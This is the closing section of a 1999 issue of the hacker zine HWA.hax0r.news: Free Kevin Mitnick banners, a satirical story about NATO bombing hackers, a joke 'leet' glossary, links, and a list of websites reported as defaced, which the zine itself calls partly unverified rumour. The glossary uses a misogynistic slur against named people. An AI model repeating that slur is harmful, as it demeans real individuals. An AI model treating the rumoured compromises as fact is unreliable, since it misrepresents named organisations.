$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! .............
-----------------------------/-----------------------------
http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440
NATO authorizes airstrikes on hackers
Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute
mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for
NATO strikes.
Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any
moment against strategic hacker targets after yet another embarrassing vandalism of a U.S. Department of
Defense website.
"This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old student in the controversial Computer
Science department at the Massachusetts Institute of Technology. "If they want to bomb us, they should do it
now so I can get back to cracking Afterlife II."
Graphics illegally uploaded to an Associated Press website accompanied a note which stated, "F1n1$h 7h1Z
60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs un173!" The web server was quickly downed in a flurry of
flamewars over the proper use of the word 'hacker' versus 'cracker' in the page.
Many college-age hackers stayed home rather than attending school, though most admit they would have
stayed home anyway.
Y2K websites issued detailed FAQs to threatened hackers in case of bombing, including information on how
long canned goods stay fresh in underground shelters, how to fix a misfiring diesel generator, and how to sow
grain in the field with a plow and oxen.
Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the last NATO threat in August,
when the alliance previously announced its intention to launch airstrikes at the notorious hacker group Cult of
the Dead Cow. Most shelters have been turned into underground bunkers featuring ISDN lines with
triple-redundancy backups, as once the hackers moved in, they found the absence of sunlight and social
involvement enjoyable.
Despite the danger, supporters of hard-line hackers were defiant.
"NATOns will fire their missiles from a distance," said Lord Kreel, an NT cracker. "Meanwhile, I will be
cracking into the Pentagon with my friends in the Lackeys of Terror. We plan to install Windows on all of their
computers, which will cripple their systems beyond repair."
Opponents of "black hat" hacking think NATO strikes will actually increase the popularity of cracking among
the techno-elite, but cement the popular image of the hacker as a no-good techie pirate bent on stealing credit
card numbers and eating babies.
"Now, [crackers will] attack all the media sites, plastering the entire web with links to porno and warez sites,
and lag the whole net to hell", said hacker Frodo Majere. "If NATO thinks they will bend hackers with bombs,
they are dead wrong."
Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been preparing to strike at well-known
pro-NATO companies and military organizations as soon as the first NATO bomb lands on hacker territory.
"We'll introduce Y2K bugs to systems where you'll never find them. We will end the disgusting
greed-infested system of monopolist capitalism by freeing information forever. Linux is the One, True God,"
said one hacker, before he was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux"
headband, symbol of the underground terrorist organization FSF. A press release issued by the FSF's guerilla
leader, known only as RMS, claimed responsibility for the killing.
NATO's secretary-general Javler Selena authorized airstrikes against known hacker sites on Tuesday, after
hackers on the IRC channel #2600 rebuffed a last-ditch peace offer and gave out free root accounts on the
whitehouse.gov server.
"In the past, computer security was a war of escalation between system administrators and joy-riding
hackers," said a spokesperson for the anti-hacker group Freedom Through Oppression. "It's high time we
brought the war to the instigators and bombed these hacker scum back to the Stone Age. To make the Internet
safe for everyone, we must squash dissension once and for all. Countries have been nuked for less."
"If you don't stand up to the theft of intellectual property of innocent companies such as SysMicrosoft and
AppMicrosoft, you threaten American competitiveness and the ability to innovate," said President Gates, as
he sought -- and got -- support from congressional leaders for military action.
"We must halt the hackers and save the Internet for our children and the future of our country. The dirty,
despicable hackers will no longer disrupt websites to make fun of our institutions, or pollute the Information
Superhighway with filthy swear words," said former Vice President Al Gore, founder of the Internet, before he
suddenly toppled over and dumped core. "NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe
006383dhX00029393."
Posted on Fri 26 Mar 00:21:38 1999 GMT
Written by Potato <meersan@linuxmail.org>
-----------------------------/-----------------------------
You have to learn the lingo to become 31337
AOL - The best isp in the world. All of the real hax0rs use it.
bot - ereet program to 0wn you irc channel for you while you are gone, Curt is the god of bots
chix0rs - girlies that hax0rs will never get because they ph33r them too much.
ftp - k-rad hax0ring utility used to get passwd files and warez.(if the passwd file is shadow, make sure you get on irc and ask
everyone how to unshadow it.)
hax0r - Someone that punts, nukes, mailbombs, and 0wns everyone else and tells them that repeatedly.
IRC - The place where lamers go to chat. The lamest channels are #2600, #hack, #phreak, #hackphreak, etc. The only k-cool
channels are #bastards on effnet, #warez, and #gaycartoonsex.
lame - stupid, not leet, suck ass, "emmanuel goldstein is lame"
leet - (elite, eleet, 1337, 31337 etc.)good, cool , k-rad, "Cochise is leet"
Linux - The OS that lamers that think they are hax0rs use.
Microsoft Unix 98 - The super k-rad OS that every real hax0r uses.
progs - Tools that every hax0r must have for punting, mailbombing, scrolling, etc.
pr0n - pictures of nekkid chix0rs. (note: this is as close to a chix0r a hax0r will ever get.)
skilless whore - a stupid bitchx0r that thinks she knows everything, but doesnt know anything. "Orin and Annie are skilless
whores"
Warez - K-rad pirated software that every hax0r must trade.
http://neatoelito.org/hax0ring/jargon.html
- submitted by A.Silliman
@HWA
SITE.1
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Looks like things are quieter than normal, perhaps with all the FBI action that's
going down and groups getting raided some people are becoming a little antsy,
well, here's the list for this week according to HNN...
From HNN rumours section, http://www.hackernews.com/
May 24th
contributed by Anonymous
Cracked
It has been a busy weekend for some people. These are
the sites that have been reported to HNN as cracked.
Please remember that this is the rumours section. While
most of these are verified we can't verify them all.
http://www.elitehackers1.net
http://www.ruckstuhlgaragen.ch
http://www.gibson.com
http://www.e.gov
http://www.ebuy.gov
http://codesign.scu.edu
http://www.castnetcom.com
http://plan.arch.usyd.edu.au
http://www.4women.gov
http://www.clic.nl
http://www.etnews.co.kr
http://www.hackvp.net
http://eval1.oit.unc.edu
http://elkriver.k12.mn.us
http://jutr.gov.my
http://nc-101.hypermart.net
http://www.barekids.com
http://www.holsey.com
http://www.team-liquid.com
http://www.metro.seoul.kr
http://learnweb.harvard.edu
http://ngpsun.ngpc.state.ne.us
http://www.buscominc.com
http://www.columbuslumber.com
http://www.cpavision.org
http://www.elitexposure.com
http://www.superiortours.com
May 27th
From HNN rumours section;
contributed by Anonymous
Cracked
These are the sites that have been reported to us as
cracked.
http://do-nt.8j.net-2
http://data.digex.net
http://nation.com.pk
http://www.pak.gov.pk
http://www.the-dark-immortals.org
May 28th
From HNN rumours section;
contributed by Anonymous
Cracked
The following websites have been reported as cracked
http://info2.cs-snd.com.cn
http://mmic.snu.ac.kr
http://vunews.vanderbilt.edu
http://wfserverb.weifang.gov.cn
http://www.abatelli.com
http://www.brain3.com
http://www.bringardner.com
http://www.century21rustic.com
http://www.cookpony.com
http://www.craftsmenhomes.com
http://www.devlin-mcniff.com
http://www.dunemere.com
http://www.firsttowne.com
http://www.hampton.net
http://www.hanfra.com
http://www.lambagency.com
http://www.mainstproperties.com
http://www.makah.org
http://www.montauk.net
http://www.morleyagency.com
http://www.moviespotlight.com
http://www.warez-city.cx
http://www.bobhowardnissan.com
http://www.cns.state.va.us
http://www.senate.gov
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file; there is now a
links section at the http://welcome.to/HWA.hax0r.news/ URL, so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links: (TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others, please send in news site links that
have security news from foreign countries for inclusion in this list,
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Colombia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
Got a link for this section? Email it to hwa@press.usmc.net and I'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]